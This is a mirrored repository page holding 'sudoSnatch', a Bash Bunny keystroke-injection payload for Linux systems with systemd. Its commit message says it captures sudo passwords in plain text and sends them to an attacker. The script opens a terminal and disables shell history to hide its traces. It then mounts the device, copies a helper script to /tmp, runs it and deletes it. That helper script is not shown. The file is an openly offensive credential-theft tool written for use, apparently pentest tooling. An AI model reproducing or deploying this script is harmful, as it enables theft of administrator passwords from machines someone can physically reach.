mirror of
https://github.com/hak5/bashbunny-payloads.git
synced 2025-10-29 16:58:25 +00:00
7f3972b88a
* uploaded sudoSnatch sudoSnatch payload grabs sudo password in plain text, imediately after victim uses `sudo` command and sends it back to attacker remotely/locally. * changing payload category * uploaded sudoSnatch
57 lines
1.1 KiB
Plaintext
57 lines
1.1 KiB
Plaintext
# Title: sudoSnatch
|
|
# Description: sudoSnatch grabs plain text passwords remotely/locally.
|
|
# AUTHOR: drapl0n
|
|
# Version: 1.0
|
|
# Category: Credentials
|
|
# Target: Unix-like operating systems with systemd.
|
|
# Attackmodes: HID, Storage
|
|
|
|
LED SETUP
|
|
ATTACKMODE STORAGE HID
|
|
GET SWITCH_POSITION
|
|
LED ATTACK
|
|
Q DELAY 1000
|
|
Q CTRL-ALT t
|
|
Q DELAY 1000
|
|
|
|
# [Prevent storing history]
|
|
Q STRING unset HISTFILE
|
|
Q ENTER
|
|
Q DELAY 200
|
|
|
|
# [Fetching BashBunny's block device]
|
|
Q STRING lol='$(lsblk | grep 1.8G)'
|
|
Q ENTER
|
|
Q DELAY 100
|
|
Q STRING disk='$(echo $lol | awk '\'{print\ '$1'}\'\)''
|
|
Q ENTER
|
|
Q DELAY 200
|
|
|
|
# [Mounting BashBunny]
|
|
Q STRING udisksctl mount -b /dev/'$disk' /tmp/tmppp
|
|
Q ENTER
|
|
Q DELAY 1400
|
|
Q STRING mntt='$(lsblk | grep $disk | awk '\'{print\ '$7'}\'\)''
|
|
Q ENTER
|
|
Q DELAY 200
|
|
|
|
# [transfering payload script]
|
|
Q STRING cp -r '$mntt'/payloads/payload.sh /tmp/
|
|
Q ENTER
|
|
Q STRING chmod +x /tmp/payload.sh
|
|
Q ENTER
|
|
Q STRING /tmp/./payload.sh
|
|
Q ENTER
|
|
Q DELAY 5000
|
|
Q STRING rm /tmp/payload.sh
|
|
Q ENTER
|
|
Q DELAY 500
|
|
|
|
# [Unmounting BashBunny]
|
|
Q STRING udisksctl unmount -b /dev/'$disk'
|
|
Q ENTER
|
|
Q DELAY 500
|
|
Q STRING exit
|
|
Q ENTER
|
|
LED FINISH
|